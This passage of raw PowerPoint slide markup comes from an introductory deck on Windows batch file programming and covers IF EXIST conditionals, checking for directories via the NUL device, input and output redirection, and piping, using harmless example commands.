        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="6000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IF</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="6000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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82764" y="1083861"/>
            <a:ext cx="4560425" cy="4992848"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="199014191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2" y="982132"/>
            <a:ext cx="9601196" cy="858243"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>IF: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" b="1" dirty="0"/>
              <a:t>CONDITIONAL BRANCHING</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="1840375"/>
            <a:ext cx="4718304" cy="567159"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>IF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>EXIST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>FILENAME Command</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="2407534"/>
            <a:ext cx="4718304" cy="3842795"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>@echo off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>	IF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>EXIST C:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>akshay.doc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>GOTO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>	AKSHAY</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>	GOTO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>end</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>	:AKSHAY</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>	ECHO AKSHAY</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>	:end</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>IF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>EXIST c:\autoexec.bat IF EXIST c:\autoexec.bak ECHO Both Exist</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6180671" y="1840375"/>
            <a:ext cx="4718304" cy="567159"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>IF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>NOT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>EXIST FILENAME Command</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6180671" y="2407534"/>
            <a:ext cx="4715926" cy="1435260"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>IF NOT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>EXIST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>	c:\somedir\somefile.dat ECHO </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>	File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>c:\somedir\somefile.dat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t> does not </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>	exist!</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"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80670" y="3842794"/>
            <a:ext cx="4715927" cy="2075008"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="317793613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Introduction</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Batch file programming is nothing but the Windows version of Unix Shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>Programming.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>	Or Batch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>file programming is the native programming offered by the Microsoft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>	Windows Operating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> System. </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Batch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>file is created using any text editors like notepad, WordPad, WinWord or so on, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>which comprises </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>of a sequence of built-in commands used to perform some often done tasks like deleting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>a series </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>of files of same type or of different type, creating logs, clearing unwanted craps from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>your computer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>and even for creating a batch VIRUS.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3645062" y="1236705"/>
            <a:ext cx="846923" cy="794719"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="292054865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5000263" y="2824223"/>
            <a:ext cx="2509513" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NULL </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="6000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>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80664" y="2920287"/>
            <a:ext cx="919599" cy="919599"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="251711176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IN" b="1" dirty="0"/>
              <a:t>NULL device</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>The NULL device </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>is basically </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>nothing, it actually stands for simply nothing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>Each directory has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>the NULL device present in it. (At least DOS thinks so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>So </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>to check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>if c:\windows exits, simply type:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>	IF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>EXIST c:\windows\nul ECHO c:\Windows exists.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="406038093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83875" y="4074802"/>
            <a:ext cx="5998052" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="4800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Redirection Operators</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6186131" y="1928965"/>
            <a:ext cx="889987" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="6000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="6000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5296144" y="1934460"/>
            <a:ext cx="889987" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="6000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="6000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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8875" y="1928965"/>
            <a:ext cx="1905000" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5759972" y="2491304"/>
            <a:ext cx="697627" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="6000" b="1" dirty="0" smtClean="0"/>
              <a:t>~</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="6000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="45136786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smtClean="0"/>
              <a:t>Redirection Operators</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>‘&gt;’Output Redirection Operator</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>To send the Output to somewhere other than the screen we use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>the Output </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Redirection Operator, &gt; which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>is most </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>commonly used to capture results of a command in a text file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>:\windows&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>dir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>*.* &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>abc.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>‘&lt;‘ Input Redirection Operator </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>It is most commonly used to send the contents </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>text file to DOS. The other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>common usage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>of this feature is the MORE command which displays a file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>one screen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>at a time unlike the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>TYPE command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>which on execution displays the entire file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>:\windows&gt;more &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0"/>
              <a:t>xyz.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="360106138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4814505" y="2599790"/>
            <a:ext cx="2356735" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="6000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Piping</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="6000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>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8936" y="3760971"/>
            <a:ext cx="2416291" cy="2416291"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3969990" y="2599788"/>
            <a:ext cx="601447" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="6000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7414308" y="2599789"/>
            <a:ext cx="601447" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
